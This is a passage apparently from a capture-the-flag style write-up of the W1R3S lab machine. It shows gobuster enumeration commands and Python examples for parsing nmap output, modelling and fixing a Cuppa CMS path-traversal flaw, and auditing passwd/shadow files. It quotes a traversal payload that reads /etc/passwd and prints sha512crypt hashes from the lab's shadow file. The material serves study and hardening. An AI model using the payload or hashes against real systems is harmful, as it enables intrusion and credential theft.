gobuster dns -d target.com -w wordlist.txt -r 8.8.8.8

# Show IP addresses
gobuster dns -d target.com -w wordlist.txt -i
```

```bash
# Full DNS scan reference (one option per line, with its meaning)
gobuster dns -d target.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
    -t 100               # threads
    -r 1.1.1.1           # DNS server
    -i                   # show IPs
    -o dns_results.txt   # output file
    --wildcard           # wildcard detection
    --timeout 10s        # timeout
```

> The other modes are documented by `gobuster [mode] -h`.
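The information-gathering section above copies the port list from one nmap run into the next by hand. As an added example (not part of the original write-up), here is a small Python parser for nmap's normal output that extracts the PORT table, keeps the NSE script lines attached to their port, builds the `-p` argument for the follow-up `-sV -sC -O` scan, and flags the anonymous-FTP finding so it can be tracked as a defect rather than lost in the output. The sample text is constructed from the scan output shown above; the function names are my own.

```python
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed sample: abbreviated from the `nmap -sT -sV -sC -O` output in the write-up.
SAMPLE_SCAN = """\
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-01 02:22 EDT
Nmap scan report for localhost (192.168.186.131)
Host is up (0.00037s latency).

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.0.8 or later
| ftp-syst:
|   STAT:
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 content
|_drwxr-xr-x    2 ftp      ftp          4096 Jan 28  2018 new-employees
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
3306/tcp open  mysql   MySQL (unauthorized)
MAC Address: 00:0C:29:E6:CB:9C (VMware)
Nmap done: 1 IP address (1 host up) scanned in 19.99 seconds
"""

# "21/tcp   open  ftp     vsftpd 2.0.8 or later" -> port, proto, state, service, version
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


@dataclass
class PortEntry:
    port: int
    proto: str
    state: str
    service: str
    version: str
    scripts: list[str] = field(default_factory=list)   # NSE output lines for this port


def parse_nmap_ports(output: str) -> list[PortEntry]:
    """Extract the PORT table from nmap normal output, attaching NSE lines to their port."""
    entries: list[PortEntry] = []
    in_table = False
    for raw in output.splitlines():
        line = raw.rstrip()
        if line.startswith("PORT "):          # header row marks the start of the table
            in_table = True
            continue
        if not in_table:
            continue
        if line.startswith("MAC Address") or line.startswith("Nmap done"):
            break                             # end of the per-port section
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            entries.append(PortEntry(int(port), proto, state, service, version or ""))
        elif line.startswith("|") and entries:
            # "|" and "|_" lines are NSE script output belonging to the last port seen
            entries[-1].scripts.append(line.lstrip("|_ "))
    return entries


def open_port_spec(entries: list[PortEntry]) -> str:
    """Comma-separated open ports, ready for nmap -p (e.g. "21,22,80,3306")."""
    return ",".join(str(e.port) for e in entries if e.state == "open")


def anonymous_ftp_allowed(entries: list[PortEntry]) -> bool:
    """True when the ftp-anon script reported a successful anonymous login."""
    return any(
        e.service == "ftp" and any("Anonymous FTP login allowed" in s for s in e.scripts)
        for e in entries
    )


if __name__ == "__main__":
    found = parse_nmap_ports(SAMPLE_SCAN)
    print("follow-up scan ports:", open_port_spec(found))
    for e in found:
        print(f"{e.port}/{e.proto} {e.state} {e.service} {e.version}")
    print("anonymous FTP:", anonymous_ftp_allowed(found))
```

Feeding real output in is a matter of reading the file nmap wrote with `-oN` instead of `SAMPLE_SCAN`; the `-oG` and `-oX` formats are easier to parse mechanically, but this parser mirrors what the write-up actually shows on screen.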
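Step 8 of the port-80 section shows the vulnerable Cuppa CMS line: a fixed directory prefix concatenated with the caller-supplied `urlConfig`, which is exactly why `../../../../../../../../../etc/passwd` walks out of the config directory. As an added example, written for this page and not taken from Cuppa CMS or the write-up, the Python below models that unsafe lookup next to a hardened one that resolves the path (collapsing `..` and symlinks), requires the result to stay strictly inside the config directory, and only accepts existing `.php` files. `demo()` builds a throwaway directory tree so everything runs offline; the directory layout, file names and function names are assumptions for illustration.

```python
from __future__ import annotations
import os
import tempfile
from pathlib import Path

# The traversal payload used against alertConfigField.php in the write-up above.
TRAVERSAL = "../../../../../../../../../etc/passwd"


def resolve_unsafe(config_dir: str, name: str) -> str:
    """Mirrors the vulnerable pattern: fixed prefix + caller-supplied name, no validation.
    '..' components walk straight out of config_dir, so any readable file gets included."""
    return os.path.normpath(os.path.join(config_dir, name))


def resolve_safe(config_dir: str, name: str) -> Path | None:
    """Hardened lookup: the final, symlink-resolved path must stay inside config_dir
    and must name an existing .php config file; anything else is refused."""
    base = Path(config_dir).resolve()
    if not name or "\x00" in name or Path(name).is_absolute():
        return None
    candidate = (base / name).resolve()
    if base not in candidate.parents:          # strict containment after '..' and symlinks collapse
        return None
    if candidate.suffix != ".php" or not candidate.is_file():
        return None
    return candidate


def demo() -> dict[str, object]:
    """Build a throwaway config directory and exercise both resolvers on good and bad input."""
    with tempfile.TemporaryDirectory() as tmp:
        # Assumed layout, modelled on the include prefix quoted in the write-up.
        config_dir = os.path.join(tmp, "components", "table_manager", "fields", "config")
        os.makedirs(config_dir)
        good = Path(config_dir, "alert.php")
        good.write_text("<?php // legitimate config file ?>\n")
        Path(config_dir, "notes.txt").write_text("not a config file\n")

        unsafe_path = resolve_unsafe(config_dir, TRAVERSAL)
        return {
            "unsafe_path": unsafe_path,                                  # e.g. /etc/passwd
            "unsafe_escapes": not unsafe_path.startswith(config_dir),    # traversal left config_dir
            "safe_traversal": resolve_safe(config_dir, TRAVERSAL),       # refused -> None
            "safe_absolute": resolve_safe(config_dir, "/etc/passwd"),    # refused -> None
            "safe_wrong_ext": resolve_safe(config_dir, "notes.txt"),     # inside, but not .php -> None
            "safe_good": resolve_safe(config_dir, "alert.php") == good.resolve(),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

An allowlist of known config names is stricter still and is the better fix when the set of includable files is finite, as it is here; the containment check above is the general form that also covers user-supplied sub-paths.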
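Steps 9 and 10 explain the second field of /etc/passwd and /etc/shadow and the `$id$salt$hash` layout. As an added example (mine, not the write-up's), this Python audit joins the two files, classifies each account's password field by the rules listed there, names the hash algorithm from the `$id$` prefix, converts the days-since-epoch field into a date, and reports which accounts have a usable password: on this box that is root and w1r3s with login shells, plus www-data, a service account that should not have had a password at all. The sample lines are copied from the dumps above; the `$id$` table lists standard crypt(3) prefixes.

```python
from __future__ import annotations
import re
from datetime import date, timedelta

# Constructed sample: a handful of lines from the /etc/passwd and /etc/shadow dumps above.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
w1r3s:x:1000:1000:w1r3s,,,:/home/w1r3s:/bin/bash
mysql:x:123:130:MySQL Server,,,:/nonexistent:/bin/false
"""
SAMPLE_SHADOW = """\
root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
daemon:*:17379:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
speech-dispatcher:!:17379:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
mysql:!:17554:0:99999:7:::
"""

# Standard crypt(3) "$id$" prefixes; "6" is what john reported as sha512crypt on this box.
HASH_IDS = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
            "5": "sha256crypt", "6": "sha512crypt", "7": "scrypt", "y": "yescrypt"}
NON_LOGIN_SHELLS = ("/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "")


def classify_secret(field: str) -> str:
    """Classify the second field of a passwd or shadow line by the rules listed above."""
    if field == "":
        return "empty"       # no password at all: anyone can log in
    if field == "x":
        return "shadowed"    # passwd placeholder: the real value lives in /etc/shadow
    if field.startswith("!"):
        return "locked"      # "!" or "!<hash>": password login locked
    if field == "*":
        return "disabled"    # account never had a usable password
    if field.startswith("$"):
        return "hash"        # a real, crackable hash
    return "legacy"          # traditional DES crypt or something unexpected


def hash_algorithm(field: str) -> str | None:
    """Name the algorithm from the $id$ prefix of a crypt(3) hash."""
    m = re.match(r"^\$([^$]+)\$", field)
    if not m:
        return None
    return HASH_IDS.get(m.group(1), f"unknown(${m.group(1)}$)")


def last_change_date(days_since_epoch: str) -> str:
    """Shadow field 3 counts days since 1970-01-01; 17554 on this box is 2018-01-23."""
    return (date(1970, 1, 1) + timedelta(days=int(days_since_epoch))).isoformat()


def parse_colon_file(text: str) -> dict[str, list[str]]:
    """Map user name -> list of fields for a passwd- or shadow-style file."""
    entries: dict[str, list[str]] = {}
    for line in text.splitlines():
        if line and not line.startswith("#"):
            fields = line.split(":")
            entries[fields[0]] = fields
    return entries


def audit(passwd_text: str, shadow_text: str) -> dict[str, str]:
    """Return user -> finding for every account whose password could actually be used."""
    passwd = parse_colon_file(passwd_text)
    shadow = parse_colon_file(shadow_text)
    findings: dict[str, str] = {}
    for user, pw in passwd.items():
        shell = pw[6] if len(pw) > 6 else ""
        secret = pw[1]
        if secret == "x" and user in shadow:      # follow the x into the shadow file
            secret = shadow[user][1]
        status = classify_secret(secret)
        if status == "empty":
            findings[user] = "no password set"
        elif status == "hash":
            algo = hash_algorithm(secret)
            changed = last_change_date(shadow[user][2]) if user in shadow else "unknown"
            kind = "service account" if shell in NON_LOGIN_SHELLS else "login-capable account"
            findings[user] = f"{kind} with a {algo} password hash (shell {shell}, set {changed})"
    return findings


if __name__ == "__main__":
    for user, finding in audit(SAMPLE_PASSWD, SAMPLE_SHADOW).items():
        print(f"{user}: {finding}")
```

On a real host run it as root against the actual files (or a copy pulled for review); a service account showing up with a hash, like www-data here, is worth a ticket even before anyone tries to crack it.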
毛林
3 October 2025, 18:27